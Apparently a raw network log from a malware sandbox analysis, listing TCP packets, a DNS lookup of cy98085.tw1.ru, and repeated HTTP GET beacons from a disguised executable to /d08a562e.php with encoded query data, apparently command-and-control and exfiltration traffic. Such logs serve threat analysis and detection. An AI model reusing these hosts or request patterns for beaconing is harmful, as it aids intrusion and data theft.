                    Nov 23, 2024 02:20:38.469568014 CET | 80 | 49812 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:38.521728039 CET | 49812 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:43.475502014 CET | 49812 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:43.476703882 CET | 49831 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:43.595140934 CET | 80 | 49812 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:43.595201969 CET | 49812 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:43.596148968 CET | 80 | 49831 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:43.596224070 CET | 49831 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:43.596457005 CET | 49831 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:43.715913057 CET | 80 | 49831 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:43.716053009 CET | 80 | 49831 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:44.961993933 CET | 80 | 49831 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:45.006113052 CET | 49831 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:49.975610018 CET | 49831 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:49.976488113 CET | 49847 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:50.095287085 CET | 80 | 49831 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:50.095444918 CET | 49831 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:50.095891953 CET | 80 | 49847 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:50.095980883 CET | 49847 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:50.096213102 CET | 49847 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:50.215678930 CET | 80 | 49847 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:50.215821981 CET | 80 | 49847 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:51.460709095 CET | 80 | 49847 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:51.506161928 CET | 49847 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:56.475513935 CET | 49847 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:56.476293087 CET | 49862 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:56.595424891 CET | 80 | 49847 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:56.595508099 CET | 49847 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:56.595774889 CET | 80 | 49862 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:56.595839024 CET | 49862 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:56.596008062 CET | 49862 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:56.715483904 CET | 80 | 49862 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:56.715606928 CET | 80 | 49862 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:58.063668966 CET | 80 | 49862 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:58.115528107 CET | 49862 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:03.224458933 CET | 49862 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:03.227166891 CET | 49878 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:03.346796989 CET | 80 | 49878 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:03.346921921 CET | 49878 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:03.349623919 CET | 80 | 49862 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:03.349694014 CET | 49862 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:03.354399920 CET | 49878 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:03.474014044 CET | 80 | 49878 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:03.474087000 CET | 80 | 49878 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:04.826591015 CET | 80 | 49878 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:04.877517939 CET | 49878 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:09.835110903 CET | 49878 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:09.836275101 CET | 49895 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:09.954895973 CET | 80 | 49878 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:09.955075026 CET | 49878 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:09.955777884 CET | 80 | 49895 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:09.955862045 CET | 49895 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:09.956015110 CET | 49895 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:10.075480938 CET | 80 | 49895 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:10.075643063 CET | 80 | 49895 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:11.367178917 CET | 80 | 49895 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:11.412440062 CET | 49895 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:16.381863117 CET | 49895 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:16.382786036 CET | 49911 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:16.501770973 CET | 80 | 49895 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:16.501857042 CET | 49895 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:16.502379894 CET | 80 | 49911 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:16.502451897 CET | 49911 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:16.502609015 CET | 49911 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:16.622279882 CET | 80 | 49911 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:16.622308016 CET | 80 | 49911 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:17.912933111 CET | 80 | 49911 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:17.959343910 CET | 49911 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:22.928857088 CET | 49911 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:22.929737091 CET | 49926 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:23.048733950 CET | 80 | 49911 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:23.048800945 CET | 49911 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:23.049137115 CET | 80 | 49926 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:23.049329996 CET | 49926 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:23.049510002 CET | 49926 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:23.168966055 CET | 80 | 49926 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:23.169080973 CET | 80 | 49926 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:24.407355070 CET | 80 | 49926 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:24.459352016 CET | 49926 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:29.464282990 CET | 49926 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:29.465318918 CET | 49942 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:29.584099054 CET | 80 | 49926 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:29.584564924 CET | 49926 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:29.584693909 CET | 80 | 49942 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:29.585838079 CET | 49942 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:29.586147070 CET | 49942 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:29.705598116 CET | 80 | 49942 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:29.705707073 CET | 80 | 49942 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:31.114972115 CET | 80 | 49942 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:31.162502050 CET | 49942 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:36.119640112 CET | 49955 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:36.120285988 CET | 49942 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:36.239126921 CET | 80 | 49955 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:36.239192963 CET | 49955 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:36.239336967 CET | 49955 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:36.359500885 CET | 80 | 49955 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:36.359513044 CET | 80 | 49955 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:37.641001940 CET | 80 | 49955 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:37.693876028 CET | 49955 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:42.647672892 CET | 49955 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:42.649194002 CET | 49971 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:42.767519951 CET | 80 | 49955 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:42.767597914 CET | 49955 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:42.768824100 CET | 80 | 49971 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:42.768934965 CET | 49971 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:42.769056082 CET | 49971 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:42.888585091 CET | 80 | 49971 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:42.888796091 CET | 80 | 49971 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:44.238723993 CET | 80 | 49971 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:44.287600994 CET | 49971 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:49.241389990 CET | 49971 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:49.242655993 CET | 49987 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:49.361270905 CET | 80 | 49971 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:49.361392975 CET | 49971 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:49.362128973 CET | 80 | 49987 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:49.362224102 CET | 49987 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:49.362415075 CET | 49987 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:49.481909990 CET | 80 | 49987 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:49.482038021 CET | 80 | 49987 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:50.766148090 CET | 80 | 49987 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:50.818808079 CET | 49987 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:55.776602983 CET | 49987 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:55.776644945 CET | 50002 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:55.896173954 CET | 80 | 50002 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:55.896496058 CET | 80 | 49987 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:55.896972895 CET | 49987 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:55.896994114 CET | 50002 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:55.897264004 CET | 50002 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:21:56.016743898 CET | 80 | 50002 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:56.016854048 CET | 80 | 50002 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:57.261507034 CET | 80 | 50002 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:21:57.303216934 CET | 50002 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:02.811764002 CET | 50002 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:02.847193956 CET | 50018 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:02.931555986 CET | 80 | 50002 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:02.931612015 CET | 50002 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:02.966650963 CET | 80 | 50018 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:02.966722965 CET | 50018 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:02.985508919 CET | 50018 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:03.105034113 CET | 80 | 50018 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:03.105127096 CET | 80 | 50018 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:04.465822935 CET | 80 | 50018 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:04.584731102 CET | 50018 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:11.257353067 CET | 50018 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:11.263879061 CET | 50029 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:11.377334118 CET | 80 | 50018 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:11.377391100 CET | 50018 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:11.383322001 CET | 80 | 50029 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:11.383389950 CET | 50029 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:11.383502960 CET | 50029 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:22:11.502975941 CET | 80 | 50029 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:11.503086090 CET | 80 | 50029 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:12.795928001 CET | 80 | 50029 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:22:12.850131989 CET | 50029 | 80 | 192.168.2.6 | 185.114.245.123
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Nov 23, 2024 02:20:07.828818083 CET | 52417 | 53 | 192.168.2.6 | 1.1.1.1
                    Nov 23, 2024 02:20:08.554492950 CET | 53 | 52417 | 1.1.1.1 | 192.168.2.6
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Nov 23, 2024 02:20:07.828818083 CET | 192.168.2.6 | 1.1.1.1 | 0xd75a | Standard query (0) | cy98085.tw1.ru | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Nov 23, 2024 02:20:08.554492950 CET | 1.1.1.1 | 192.168.2.6 | 0xd75a | No error (0) | cy98085.tw1.ru | | 185.114.245.123 | A (IP address) | IN (0x0001) | false
                    • cy98085.tw1.ru
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.6 | 49723 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:08.731681108 CET | 590 | OUT | GET /d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM HTTP/1.1
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:20:10.246021032 CET | 1236 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 2160
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    Data Raw: 3d 3d 51 66 69 45 57 4d 6d 4e 6d 4d 6d 42 6a 59 7a 55 6d 5a 6c 5a 6a 4e 34 49 6a 4d 79 41 54 5a 6a 4e 54 4e 6d 46 57 4d 34 51 57 4e 31 55 47 4e 69 6f 6a 49 34 67 54 59 30 55 57 4f 79 55 47 5a 32 63 44 4e 30 4d 54 4e 78 51 57 4f 69 4e 6d 59 6c 68 54 4f 32 59 6a 59 35 55 47 4e 31 45 6a 49 73 49 69 5a 52 39 32 64 50 6c 6d 53 35 70 46 57 53 6c 6e 57 59 70 56 64 69 42 6a 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 39 55 52 61 56 6c 56 57 6c 7a 63 69 4a 6a 53 30 56 6d 56 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 5a 6b 54 57 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e [TRUNCATED]
                    Data Ascii: == [TRUNCATED]
                    Nov 23, 2024 02:20:10.246107101 CET | 1111 | IN | Data Raw: 46 30 62 7a 6c 55 61 4a 5a 54 53 74 5a 31 61 69 42 6a 54 6f 70 46 57 4b 68 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 62 30 6c 6e 59 78 73 32 5a 6b 4a 6a 56 50 6c 6b 61 76 6c 6d 57 58 46 44 61 55 31 57
                    Data Ascii: F0bzlUaJZTStZ1aiBjTopFWKhGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxs2ZkJjVPlkavlmWXFDaU1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJNUQLx0QKpFVplkNJ1mVrJGMOVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1UCNjWVRTaPlmS1JmMs5mWYpkZi1GbuR2V4dnYyYlbJlWQnNUa3lWYzokdXNlQ


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.6 | 49729 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:11.861928940 CET | 826 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.6 | 49730 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:11.871232033 CET | 2229 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0Q [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.6 | 49731 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:12.104047060 CET | 1437 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&53aa3a9fb57d34776a6131d2274538b1= [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:20:13.439039946 CET | 161 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 0
                    Connection: keep-alive


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.6 | 49757 | 185.114.245.123 | 80 | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:20:17.081677914 CET | 2209 | OUT | GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:20:18.599766016 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
